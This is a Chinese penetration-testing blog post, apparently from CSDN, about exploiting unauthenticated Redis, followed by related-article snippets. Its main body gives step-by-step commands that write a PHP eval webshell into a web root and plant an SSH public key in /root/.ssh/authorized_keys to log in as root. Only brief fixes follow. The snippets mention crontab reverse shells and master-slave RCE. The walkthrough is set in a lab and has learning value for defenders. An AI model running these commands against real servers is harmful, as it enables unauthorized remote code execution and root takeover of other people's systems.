13,Redis备份写入Shell以及公钥

于 2024-09-24 00:24:03 发布
阅读量365 收藏 4
点赞数 5
分类专栏: 渗透测试 文章标签: redis 数据库 缓存 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64040060/article/details/142471871
版权

利用redis 备份数据库文件写入shell
漏洞产生的条件有以下两点:
    1. redis服务绑定在0.0.0.0:6379端口,而且信任了其他IP,导致了Redis服务暴露在公网上
    2. 没有设置密码认证,可以免密登陆Redis服务
危害:
    1.导致敏感信息泄露,恶意执行flushall清空所有数据
    2.通过Eval执行Lua代码,通过备份功能往磁盘写入后门文件
    3.如果Redis服务以root身份运行,可以给root用户写入SSH公钥文件,直接通过SSH登陆服务器
    
    进入src目录
        使用make进行编译
            /src# make
    启动Redis服务: # ./redis-server 
    连接Redis服务: # ./redis-cli
    设置保存路径
        127.0.0.1:6379> CONFIG SET dir /var/www/html
    设置存储名字
        127.0.0.1:6379> CONFIG SET dbfilename demo.php
    设置写入内容    
        127.0.0.1:6379> set name "<?php eval($_GET[1]);?>"
    输入save保存即可在访问在/var/www/html下的demo.php
        保存: 127.0.0.1:6379> save
    浏览器访问: http://127.0.0.1/demo.php?1=phpinfo();
写入公钥
    条件:
        a、redis 服务以 root 账户运行
        b、redis 无密码或弱密码进行认证
        c、redis 监听在 0.0.0.0 公网上
    方法:
        a、通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫
        b、上传 SSH 公钥获得 SSH 登录权限
        c、通过 crontab 反弹 shell
        d、slave 主从模式利用
    
    利用Redis写入公钥
        将id_rsa.pub导出为txt文件,需要将txt文件内容前后手动添加回车
    传输文件
        key_test# cat id_rsa.txt | redis-cli -x set wahaha
    设置保存路径
        127.0.0.1:6379> CONFIG SET dir /root/.ssh
    设置存储名字
        127.0.0.1:6379> CONFIG SET dbfilename authorized_keys
    输入save保存即可在/root/.ssh下查看
        127.0.0.1:6379> save
    使用公钥登录 ssh -i id_rsa root@ip
        # ssh -i id_rsa root@192.168.21.147
修复
    密码验证
    降权运行
    限制 ip/修改端口

昊天妹妹
关注
专栏目录
redis攻防知识汇总
admin的博客
05-13 170
Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有进行有效保护措施,那么处于公网的redis服务就会被任意的用户未授权访问,读取数据,甚至利用redis自身的命令,进行写入文件操作,这样就会恶意攻击者利用redis未授权漏洞进行进一步攻击。
redis 在渗透中 getshell 方法总结
chenglanqi6606的博客
05-07 2598
0x00 前言 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。如果有同学恰好看到了这篇文章,并能解决自己的问题,...
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3362
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(未授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
Xshell工具利用Redis 6379写入SSH公钥漏洞
maple_leaf
05-03 497
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
记一次学习过程(redis的编译安装,以及有关redis漏洞的学习,包括redis未授权写入ssh公钥redis写入木马、redis主从复制漏洞linux版)同时记录几个威胁分析平台
最新发布
banliyaoguai的博客
08-03 955
这个东西的流程是你发现了一个网站,然后你扫描对方端口,发现6379端口开着,而且通过一些其他漏洞可以登陆上redis后,你在redis中执行操作获取webshell权限。测试公私钥的时候不要在你的攻击机子和redis的服务器的机子上测试,或者你把测试完成的文件在服务器上删掉,删掉之前记得保存。这个是你冒充redis的主服务器,让redis从服务器下载木马(这里使用工具)这是你已经连接上了redis,你在redis中操作,在redis写入公钥。(下图是测试出现问题的情况,没出现问题的情况忘记截图了)
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2712
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
ssrf结合redis写入公钥
m0_65540912的博客
07-05 880
我这里用了Web-Redis-Lab漏洞环境来演示攻击机kali:192.168.168.128。
以下哪些方式可以结合或利用redis服务进行攻击? 在redis写入ssh公钥,获取操作系统权限 在crontab里写入定时任务,反弹shell 组合SSRF漏洞攻击redis服务 redis主从复制RCE
06-09
1. 在 Redis写入 SSH 公钥,获取操作系统权限:攻击者可以通过 Redis 服务将 SSH 公钥写入目标服务器中,然后利用该公钥获取操作系统权限。 2. 在 crontab 里写入定时任务,反弹 Shell:攻击者可以通过 Redis ...
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2271
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
redis未授权访问(4-unacc)
qq_56289291的博客
07-07 1203
漏洞复现
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 4027
利用redis备份功能,写入ssh公钥
Redis未授权访问利用
LiuSiXian的博客
07-14 738
Redis服务器:192.168.100.10攻击机:192.168.15.101。
浅谈Linux下的redis攻击
qq_64201116的博客
10-17 5276
redis服务ip:192.168.65.163 (CentOs)redis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。
redis非授权访问漏洞
weixin_43995159的博客
11-29 1262
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
redis-getshell
m0_60823533的博客
09-25 190
1. 使用yum安装redis 命令:yum install redis -y。地址 http://192.168.88.128/shell.php。2.连接redis服务端(centos),出现以下如图表示连接成功。1.服务端(centos)安装web环境,直接一键安装宝塔。1.进入 /root/.ssh 目录生成ssh公私钥。2.安装完成,打开bt网站后台,安装环境。“\n\n 公钥内容 \n\n“3.添加一个站点,记住以下路径。6.启动redis连接测试。2.将生成的公钥(文件。
WAF,Yakit,SSH 小技巧
来日可期的博客
10-18 666
WAF,Yakit,SSH小技巧
fscan写入redis公钥
06-01
fscan指的是将指定文件中的内容读取到Redis数据库中。写入Redis公钥的过程可以通过以下步骤实现: 1. 打开公钥文件,使用fopen函数打开文件,获取文件指针。 2. 读取公钥文件中的内容,使用fread函数读取公钥文件中的内容。 3. 将公钥文件中的内容写入Redis数据库,使用Redis的SET命令将读取到的公钥字符串写入Redis数据库中。 4. 关闭公钥文件,使用fclose函数关闭打开的文件指针。 以下是一个示例代码: ``` #include <stdio.h> #include <stdlib.h> #include <string.h> #include <hiredis/hiredis.h> #define PUBLIC_KEY_FILE "public_key.pem" int main() { // 打开公钥文件 FILE* fp = fopen(PUBLIC_KEY_FILE, "r"); if (fp == NULL) { printf("Failed to open public key file.\n"); return -1; } // 读取公钥文件中的内容 fseek(fp, 0L, SEEK_END); long file_size = ftell(fp); fseek(fp, 0L, SEEK_SET); char* public_key = malloc(file_size + 1); fread(public_key, file_size, 1, fp); public_key[file_size] = '\0'; fclose(fp); // 将公钥写入Redis数据库 redisContext* c = redisConnect("127.0.0.1", 6379); if (c == NULL || c->err) { printf("Failed to connect to Redis database.\n"); return -1; } redisReply* reply = (redisReply*) redisCommand(c, "SET public_key %s", public_key); free(public_key); if (reply == NULL || reply->type == REDIS_REPLY_ERROR) { printf("Failed to write public key to Redis database.\n"); return -1; } freeReplyObject(reply); redisFree(c); printf("Public key has been written to Redis database.\n"); return 0; } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值